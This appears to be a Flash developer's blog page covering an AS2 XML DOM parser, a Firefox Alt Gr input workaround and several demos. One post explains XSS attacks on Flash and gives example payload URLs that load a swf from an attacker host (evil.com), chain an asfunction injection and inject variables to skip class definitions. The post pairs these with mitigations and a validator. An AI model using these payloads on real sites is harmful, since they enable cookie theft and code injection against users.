logga


xml reading in as2

Xml reading with the built-in functions in as2 is not the funniest thing to do. In as3 it's a lot better, as you probably know. To make it easier in as2 I made an xml parser that makes it possible to read the xml as a dom-tree. There are a lot of similar classes and some of them are probably better than mine, or at least more advanced. This class is only for reading, since you almost never alter xmls and seldom write them. The class is about 4 years old, but since I use it in almost every as2 project I thought I could share it.

source:
xmldomdemo.rar

usage:
import se.superkrut.util.XMLDom;

var xml:XML = new XML();
xml.ignoreWhite = true; // drop the whitespace-only nodes between the tags
xml.onLoad = function(success:Boolean){
    if(!success){
        trace("could not load language.xml");
        return;
    }
    // wrap the raw XML object in the dom-tree
    var xmldom:XMLDom = new XMLDom(this);
    trace("first:"+xmldom.root.language.swedish.text.bye.value);
    trace("second:"+xmldom.root.language.swedish.text[1].value);
    trace("attribute:" + xmldom.root.language.attributes.id);
}
xml.load("language.xml");

where language.xml is:

<?xml version="1.0" ?>
<root>
    <language id="swedish">
        <text id="hello">hej</text>
        <text id="bye">hej då</text>
    </language>
</root>

All instances have a __resolve function that maps unknown property lookups to the first position in the child array. For example,
xmldom.root.language is the same as xmldom.root[0].language

The id attribute is automatically mapped to a property on the instance. For example,
language.swedish is mapped from the id attribute.
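The same dom-tree conventions in JavaScript, as an added example that is not the XMLDom class from the post: sibling elements are collected per tag name, an unknown name on such a list falls through to element [0] (the __resolve trick) unless a sibling carries that name as its id, and the language.xml above is embedded as constructed input. The tokenizer only handles plain elements and double-quoted attributes, which is all this file needs.

```javascript
// Constructed sample input, the language.xml from the post.
const LANGUAGE_XML = `<?xml version="1.0" ?>
<root>
<language id="swedish">
<text id="hello">hej</text>
<text id="bye">hej då</text>
</language>
</root>`;

// Tokens: xml declaration | closing tag | opening tag (attrs, optional /) | text.
const TOKEN = /<\?[^>]*\?>|<\/([\w-]+)\s*>|<([\w-]+)((?:\s+[\w-]+="[^"]*")*)\s*(\/?)>|([^<]+)/g;

// A sibling list behaves like the XMLDom arrays: unknown names fall through to
// element [0] (the __resolve trick) unless a sibling has that name as its id.
function wrap(list) {
  return new Proxy(list, {
    get(target, prop) {
      if (prop in target) return target[prop];               // index, length, methods
      const byId = target.find(n => n.attributes.id === prop);
      if (byId) return byId;                                  // id attribute -> property
      return target.length ? target[0][prop] : undefined;     // __resolve to first child
    }
  });
}

// Builds the tree: every node has .attributes, .value (its text) and one
// wrapped sibling list per child tag name (tags named "value" or
// "attributes" would clash; assumed not to occur).
function parseXml(src) {
  const doc = { attributes: {}, value: "" };
  const stack = [doc];
  let m;
  while ((m = TOKEN.exec(src)) !== null) {
    const [, close, open, attrSrc, selfClose, text] = m;
    const top = stack[stack.length - 1];
    if (close !== undefined) {
      stack.pop();
    } else if (open !== undefined) {
      const node = { attributes: {}, value: "" };
      for (const [, k, v] of attrSrc.matchAll(/([\w-]+)="([^"]*)"/g)) node.attributes[k] = v;
      if (!(open in top)) top[open] = wrap([]);
      top[open].push(node);
      if (!selfClose) stack.push(node);
    } else if (text !== undefined && text.trim() !== "") {
      top.value += text.trim();
    }
  }
  return doc;
}

const xmldom = parseXml(LANGUAGE_XML);
console.log("first:" + xmldom.root.language.swedish.text.bye.value);   // hej då
console.log("attribute:" + xmldom.root.language.attributes.id);        // swedish
```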

No Comments to “xml reading in as2”

xss vulnerabilities in flash

I saw this article linked from slashdot about xss vulnerabilities in flash. The article doesn't say much about how the hacks are performed and I have not read the book, but I can guess. Since it's an xss exploit it is probably about tricking a person into entering a page with some additional get variables that are passed to a swf on the page, as flashvars or as get variables. It's really nothing new as far as I can see; maybe point 3 below is a little bit unknown. But since a book about it (Hacking Exposed Web 2.0: Web 2.0 Security Secrets and Solutions) is coming, a lot of people are probably going to try it out. How the security holes can be used depends on the setup.

1. Passing the url to load
php: host.swf?load=$_GET['load_url'];
as2: mc.loadMovie(_root.load_url);

This is most common in small applications such as image viewers or preloaders. A variant of this is passing a variable with the url of an xml that lists urls to load, for instance playlists for image slideshows. Sometimes all the get variables are appended to an existing query string, with a possible result:

php: host.swf?load=main.swf&text=hey&load=http%3A%2F%2Fevil.com%2Fhack.swf

which results in the latter being set as _root.load, so a swf from another domain is loaded.

With System.security.allowDomain("*"); the loaded swf can execute a lot of funny stuff with the same privileges as the root swf, for instance steal and send cookies with javascript, and since you can write code that crashes the browser you could probably do some really ugly arbitrary tricks. allowDomain("*") is quite common in more complex systems where content is shared between domains and content is moved between domains during development, testing and authoring.

2. Passing texts to be displayed.
php: host.swf?text=$_GET['text'];
as2: tf.htmlText = _root.text;

It's not that common to pass the texts to be displayed as a get variable. A much more common thing is to pass a url to an xml with the text to display. Since htmlText can contain asfunction you can trick the player into running code, which makes this trick as serious as the first example, possibly more so since you can't stop it with a restrictive allowDomain().

I'm not going to go into details about it; examples can be found at
http://events.ccc.de/camp/2007/Fahrplan/attachments/1320-FlashSec.pdf
http://www.owasp.org/images/d/d8/OWASP-WASCAppSec2007SanJose_FindingVulnsinFlashApps.ppt

3. Changing the execution of the code.
You can inject variables that prevent the creation of classes in memory.
host.swf?SomeClass=foo
As2 compiles to as1, which is a script language, and the creation of a class looks like:
if(_global.SomeClass == undefined){
    _global.SomeClass = ...
}

The variables sent to the swf make the "is this class already in memory" test come out true, so the real class is never defined. The lack of the right class can then be used for an attack. It might be possible to do some serious things with this, but you have to decompile the swf and find the right spots. An example could be removal of validation: if containsScriptSchemes is undefined, all calls to it evaluate to undefined, which is treated as false.

A possible scenario, to sum it all up, could be: use 3 to make it possible to run the asfunctions described in 2, use the asfunction to rewrite the allowDomain policy, and then load a swf with full control from a remote domain (1). I have not tried it, but something like this could be possible. It might sound hard to achieve, but the execution order fits quite well. A possible hack against a suitable target would be (with some escapes):

host.swf?as2DataValidation=foo&text='><img src='asfunction:System.security.allowDomain,"*"//.jpg'&load=http://evil.c/evil.swf

Well, what's the solution then?

- The loudest on slashdot disable flash and call it evil. I don't promote that solution since flash puts food on my table.

- Adobe wants you to install flash player 9.0.115.0. I don't think that's going to happen overnight unless youtube and myspace force us all.

Since you can't blame the stupid users for clicking on all links sent to them, it's better to blame the lazy programmers and start there.

- Don't send all the getvars directly to the swf. This is the central part of the exploit, but it's not suitable all the time.

- If you need to send all get variables, send them as one variable instead and write a function to retrieve them: host.swf?args=[text,hey,load,main.swf]

- Validate all texts sent to the swf before using them. Download http://code.google.com/p/flash-validators/ and use containsScriptSchemes to check for scripts. If you want to use asfunctions in htmlText you should hard code them and substitute them into the text. But be aware of point 3 above.

- Be more restrictive with System.security.allowDomain(). We have all cursed the sandbox, but it keeps you safe.

- Consider not using the allowscriptaccess="always" attribute in the embed tag.

- Use __resolve to catch calls to undefined. This can result in unexpected behavior and might not help at all.

I might be all wrong about the security hole they are going to publish, but the above might be useful anyway.
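The "don't pass the getvars straight through" advice as working code, added here as an example and not taken from the post (the post's setup is PHP; the same checks apply there). It builds the flashvars string for the embed from an allow-list, so a stray SomeClass=foo or as2DataValidation=foo from point 3 never reaches the swf, rejects a duplicated load that would let the last value win, refuses a load target with a scheme or a leading slash, and refuses text carrying an asfunction: or javascript: scheme. ALLOWED, checkPath, checkText and buildFlashVars are my names.

```javascript
const ALLOWED = { load: "path", text: "text" };  // the only names the swf ever gets
const SCHEME = /(^|[^\w])(asfunction|javascript|vbscript|data)\s*:/i;
const MAX_TEXT = 200;

// A load target must be a same-site relative file: a scheme (':' is not in the
// class), a leading '/' (absolute or protocol-relative //evil.com) or '..' reject.
function checkPath(v) {
  return /^(?!\/)(?!.*\.\.)[\w./-]+\.(swf|xml)$/.test(v) ? v : null;
}

// Text meant for htmlText must not smuggle a script scheme, also not inside
// an <img src='asfunction:...'> tag.
function checkText(v) {
  return v.length <= MAX_TEXT && !SCHEME.test(v) ? v : null;
}

// Turns the incoming query string into the value for the flashvars attribute.
// Returns null when any allowed variable fails its check or appears twice
// (load=main.swf&load=http%3A%2F%2Fevil... would otherwise let the last one win).
function buildFlashVars(queryString) {
  const params = new URLSearchParams(queryString);  // url-decodes %3A%2F%2F etc.
  const out = [];
  for (const name of Object.keys(ALLOWED)) {
    const values = params.getAll(name);
    if (values.length === 0) continue;
    if (values.length > 1) return null;
    const checked = ALLOWED[name] === "path" ? checkPath(values[0]) : checkText(values[0]);
    if (checked === null) return null;
    out.push(encodeURIComponent(name) + "=" + encodeURIComponent(checked));
  }
  // Names outside ALLOWED (SomeClass=foo, as2DataValidation=foo) are dropped.
  return out.join("&");
}

console.log(buildFlashVars("load=main.swf&text=hey"));  // load=main.swf&text=hey
```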

No Comments to “xss vulnerabilities in flash”

inputfields and transparency in firefox for windows

There are a lot of bugs related to wmode=transparent or opaque for firefox on windows; on linux it doesn't seem to work at all. This particular bug is that you can't write @ on a swedish keyboard in input textfields. Normally you write @ with Alt Gr+2, but if you try, a normal 2 is written. The fault happens for most Alt Gr codes such as £${[]}. A quick workaround is to use the english Shift+2, but most people don't know that. Or you can paste it in from elsewhere. Another workaround a friend of mine gave me is to pretype the @ in the textfield and let the user write his email around it. There are some other workarounds, but none of them was nice enough.

without the fix

with the fix

My solution registers a key listener when a textfield is selected and stores the key-code sequence in a key buffer. If 17, 18, 50 is pressed an @ is written instead of the 2: 17, 18 is Alt Gr and 50 is the 2 key. Other key-code sequences are mapped to other signs. If another textfield or something else gets focus, the listeners are removed. The class might need some localisation changes to work on different keyboard layouts.

The class has a very simple setup.

InputFix.initialize();

Once initialized it works on all textfields in the application. One important thing is that you have to embed the font for the numbers even if you are not going to use them. If the chars are missing, the onChanged event on the textfield is not executed.

A preferred solution is to send the browser as a flashvar and only initialize it for firefox on windows.
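The key-buffer idea in JavaScript, as an added example and not the InputFix class from the post: codes are buffered, and when the last three are Ctrl (17), Alt (18) and a digit the plain digit that got through is swapped for the Alt Gr sign. Only the @ mapping is from the post; the rest of the sign table is my assumption about the Swedish layout, and typeCodes is a simulation helper that only knows digit and upper-case letter codes.

```javascript
// Assumed sign table for the Swedish layout: digit key code -> sign typed with Alt Gr.
const ALTGR_SIGNS = { 50: "@", 51: "£", 52: "$", 55: "{", 56: "[", 57: "]", 48: "}" };

class KeyBuffer {
  constructor() { this.codes = []; }
  // Record one key-down code. Returns the sign to write when the last three
  // codes are Ctrl (17), Alt (18) and a digit from the table, otherwise null.
  push(code) {
    this.codes.push(code);
    if (this.codes.length > 3) this.codes.shift();
    const [a, b, c] = this.codes;
    if (this.codes.length === 3 && a === 17 && b === 18 && c in ALTGR_SIGNS) {
      this.codes = [];
      return ALTGR_SIGNS[c];
    }
    return null;
  }
}

// What the onChanged handler does: the browser already put the plain digit into
// the field, so the last character is swapped for the sign when the buffer says so.
function onChanged(fieldText, buffer, code) {
  const sign = buffer.push(code);
  return sign === null ? fieldText : fieldText.slice(0, -1) + sign;
}

// Simulation helper: feed a key-code sequence and return the field text.
// Key codes 48..57 and 65..90 happen to equal the char codes of '0'..'9' and 'A'..'Z'.
function typeCodes(codes, buffer = new KeyBuffer()) {
  let text = "";
  for (const code of codes) {
    if (code !== 17 && code !== 18) text += String.fromCharCode(code);
    text = onChanged(text, buffer, code);
  }
  return text;
}

console.log(typeCodes([65, 17, 18, 50, 66]));  // A@B
```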

source: text, package

7 Comments to “inputfields and transparency in firefox for windows”

soundscape

Every dot has its own beat and the application plays the sounds of the five dots closest to the mouse. I have a lot more ideas on this concept but I don't have the time to code them. So instead of waiting I publish this early beta. Thanks albin for the sounds.

source: soundscape0.5.zip
compile with: /usr/bin/mtasc -header 800:600:25 -main -swf deploy/soundscape.swf -cp /media/sda3/www/soundscape/source soundMix/Initializer (or similar)

No Comments to “soundscape”

Morph car

All large car company pages have a rotating car on their site. They are either made of images put together in a rotation, an flv playing a rotation or in some rare cases papervision. Here is an idea about morphing between images. It's too CPU heavy to use in a real application unless some angles are pre-rendered and used instead of being calculated in each frame.

The two images are faded and morphed together. If you move the mouse to the top of the application you will see the morphing grid.

source

2 Comments to “Morph car”

Videoflag

The main purpose of this application is to show my 3D-engine. First I wanted to take movies directly from youtube or similar, but since you can't read bitmapdata from flv I had to convert to swf. There are some serverside tricks to make it possible but my cheap hotel doesn't give me the opportunity.

It uses the now classical triangle trick together with the transform matrix. It hangs once in a while, especially when it's lying down. I'm planning to fix it.

The flag effect is made with some sine functions. The engine doesn't have a depth manager, which must be implemented to be able to use it in more advanced applications. A more serious 3d-engine is the papervision3d engine. Or consider using processing.

source

No Comments to “Videoflag”